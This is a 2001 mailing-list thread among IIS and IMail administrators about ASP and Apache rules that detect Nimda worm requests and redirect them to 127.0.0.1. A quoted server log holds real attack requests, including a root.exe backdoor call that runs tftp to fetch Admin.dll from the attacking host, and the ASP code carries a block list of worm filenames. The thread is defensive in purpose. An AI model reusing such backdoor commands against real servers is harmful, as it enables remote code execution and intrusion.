I did reply earlier, saying you can't use that code if you're serving IMail on port 80. If those are IIS logs, the Judo code doesn't guarantee that you won't continue to get requests. It will help by minimizing your 404 page size, and others have reported the offending servers make far fewer requests after being redirected to themselves.
-Ron > -----Original Message----- > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of > Webmaster Oilfield Directory > Sent: Saturday, September 29, 2001 2:54 AM > To: [EMAIL PROTECTED] > Subject: RE: [imail] IIS Judo against Nimda's DoS attacks (was Fwd: > [isp-linux] Buaaa Haaa Ha Haaaaaaaaa...) > Importance: High > > > Dear Ron: > > I wrote you about this earlier and didn't get a reply, please > let me know > what you think! > > I tried to implement the code you mentioned below but it seems > i am still > getting some of those bad requests... see here.. > this is the log file from imail server (standalone that is running win2k > server and IIS 5.0 with your your ezsignup utility. > > 20010927 033141 216.254.88.229, , , GET > /scripts/root.exe?/c+dir HTTP/1.0 > 20010927 033142 216.254.88.229, , , GET > /scripts/root.exe?/c+tftp%20-i%20216.254.88.229%20GET%20Admin.dl > l%20Admin.dl > l HTTP/1.0 > 20010927 033142 216.254.88.229, , , GET /scripts/Admin.dll HTTP/1.0 > 20010927 033143 216.254.88.229, , , GET /MSADC/root.exe?/c+dir HTTP/1.0 > > any ideas, maybe i havn't configured it properly? I revised > the code a bit > to redirect to the home page after 5 seconds... could that cause it? > > Maybe i installed it in the wrong place, please advise me, thanks! > > > here is my "version" > > > <% > myRequest=Request.ServerVariables("QUERY_STRING") > > 'A list of filenames virus looks for or in this case to protect > > myBadList="cmd.exe,root.exe,admin.dll,default.ida,.exe,.dll,.ida > ,.htr,.print > er" > > 'Detect a GET request from the Nimda virus and take appropriate action > arrBadString=Split(myBadList,",") > for i=0 to UBound(arrBadString) > if inStr(myRequest,arrBadString(i))>0 then > 'turn offending server back on itself > Response.redirect "http://127.0.0.1"; > end if > next > %> > <HTML> > <HEAD> > <META NAME="ROBOTS" CONTENT="NOINDEX"> > > <SCRIPT LANGUAGE="JAVASCRIPT"> > var timerID=""; > function loadPage() > { > clearTimeout(timerID); > window.location.href="/"; > } > </SCRIPT> > <SCRIPT LANGUAGE="JAVASCRIPT1.1"> > function loadPage() > { > clearTimeout(timerID); > window.location.href="/"; > } > </SCRIPT> > > <SCRIPT LANGUAGE="JAVASCRIPT1.2"> > function loadPage() > { > clearTimeout(timerID); > window.location.href="/"; > } > </SCRIPT> > <a href="/">Home Page</a>. > </HEAD> > <BODY BGCOLOR="#000000"> > > <BR><BR><BR><BR><BR> > > <CENTER><STRONG><EM> > <FONT COLOR="#FFFF00" SIZE="+2">sorry..., that page is missing > or has been > moved, <br>redirecting to home page.</FONT> > </EM></STRONG></CENTER> > > <SCRIPT LANGUAGE="JAVASCRIPT"> > timerID=setTimeout("loadPage()", 4500); > </SCRIPT> > > </BODY> > </HTML> > > > > -----Original Message----- > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of Ron > Hornbaker > Sent: Friday, September 21, 2001 2:35 PM > To: [EMAIL PROTECTED] > Subject: RE: [imail] IIS Judo against Nimda's DoS attacks (was Fwd: > [isp-linux] Buaaa Haaa Ha Haaaaaaaaa...) > > > If it's a legitimate file, it won't return a 404 error, so the Judo page > won't be triggered. So, technically, you could make your badlist look > something like: > > ".exe,.dll,.ida,.htr,.printer" > > and whatever else you wanted, so that any malicious-looking 404s would > turned back, Grasshopper-san-style. > > > Ron Hornbaker > President/CTO > . . . . . . . . . . . . http://humankindsystems.com > . . . . . . . . . . . . w e c o d e. w e c a r e. > > > > > > -----Original Message----- > > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of > > Charles Frolick > > Sent: Friday, September 21, 2001 4:30 PM > > To: [EMAIL PROTECTED] > > Subject: RE: [imail] IIS Judo against Nimda's DoS attacks (was Fwd: > > [isp-linux] Buaaa Haaa Ha Haaaaaaaaa...) > > > > > > Not sure how it is used, but Frontpage extensions actually uses > > a admin.dll > > in the frontpage directories. Need to make sure your sites > > don't need it > > for normal operation. > > > > Chuck Frolick > > ArgoNet, Inc. > > > > -----Original Message----- > > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On > Behalf Of Ron > > Hornbaker > > Sent: Friday, September 21, 2001 3:24 PM > > To: [EMAIL PROTECTED] > > Subject: RE: [imail] IIS Judo against Nimda's DoS attacks (was Fwd: > > [isp-linux] Buaaa Haaa Ha Haaaaaaaaa...) > > > > > > Change the code to this and just edit the comma-delimited myBadList > > variable: > > > > <% > > 'Custom404.asp page to thwart Nimda DoS attacks on IIS > > 'by Humankind Systems, Inc. http://hksi.net/ > > 'No support or guarantees of any kind are granted with this > > 'code. Use at your own risk. Distribute freely. > > > > 'Get the entire URL requested > > myRequest=Request.ServerVariables("QUERY_STRING") > > > > 'A list of filenames Nimda looks for > > myBadList="cmd.exe,root.exe,admin.dll,default.ida" > > > > 'Detect a GET request from the Nimda virus and take appropriate action > > arrBadString=Split(myBadList,",") > > for i=0 to UBound(arrBadString) > > if inStr(myRequest,arrBadString(i))>0 then > > 'turn offending server back on itself > > Response.redirect "http://127.0.0.1"; > > end if > > next > > %> > > <html> > > <head> > > <title>Page Not Found</title> > > </head> > > <body> > > Sorry, but that page was not found on our server. > > <p> > > Here is a link back to our <a href="/">Home Page</a>. > > </body> > > </html> > > > > > > > > Ron Hornbaker > > President/CTO > > . . . . . . . . . . . . http://humankindsystems.com > > . . . . . . . . . . . . w e c o d e. w e c a r e. > > > > > > > > > > > -----Original Message----- > > > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On > > Behalf Of Len > > > Conrad > > > Sent: Friday, September 21, 2001 3:06 PM > > > To: [EMAIL PROTECTED] > > > Subject: Fwd: [isp-linux] Re: [imail] Buaaa Haaa Ha Haaaaaaaaa... > > > > > > > > > Ron, > > > > > > what about admin.dll, and here�s a couple more > > > > > > Len > > > > > > -------------------- > > > > > > > > > >From: "Bill Larson" <[EMAIL PROTECTED]> > > > >To: [EMAIL PROTECTED] > > > >Subject: [isp-linux] Re: Buaaa Haaa Ha Haaaaaaaaa... > > > >Date: Fri, 21 Sep 2001 14:21:24 -0500 > > > >X-Mailer: Microsoft Outlook Express 6.00.2600.0000 > > > >List-Unsubscribe: > <mailto:[EMAIL PROTECTED]> > > > >Reply-To: [EMAIL PROTECTED] > > > >X-INTM-Message-Id: > > > ><INTM-62637-1230739-2001.09.21-14.26.57--lconrad#go2france.com@ > > > lists.isp-lists.com> > > > >X-Virus-Scanned: by VirusGate.MEIway.com > > > >X-RCPT-TO: <[EMAIL PROTECTED]> > > > > > > > >RedirectMatch (.*)\cmd.exe$ http://127.0.0.1 > > > >RedirectMatch (.*)\default.ida$ http://127.0.0.1 > > > >RedirectMatch (.*)\root.exe$ http://127.0.0.1 > > > > > > > >I added a couple > > > > > > > >----- Original Message ----- > > > >From: "Nick Weerheim" <[EMAIL PROTECTED]> > > > >To: <[EMAIL PROTECTED]> > > > >Sent: Friday, September 21, 2001 2:16 PM > > > >Subject: [isp-linux] Re: Buaaa Haaa Ha Haaaaaaaaa... > > > > > > > > > > > > > this is freaky.... the attacks here have stopped too.... > > > thats crazy..... > > > > > > > > > > ______________________________________________________________________ > > The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc. > > Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED] > > Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4 > > To Manage your Subscription......... http://humankindsystems.com/lists > > > > > > > > > > > > ______________________________________________________________________ > > The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc. > > Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED] > > Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4 > > To Manage your Subscription......... http://humankindsystems.com/lists > > > > > > > > > ______________________________________________________________________ > The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc. > Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED] > Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4 > To Manage your Subscription......... http://humankindsystems.com/lists > > > > > ______________________________________________________________________ > The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc. > Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED] > Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4 > To Manage your Subscription......... http://humankindsystems.com/lists > > ______________________________________________________________________ The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc. Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED] Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4 To Manage your Subscription......... http://humankindsystems.com/lists
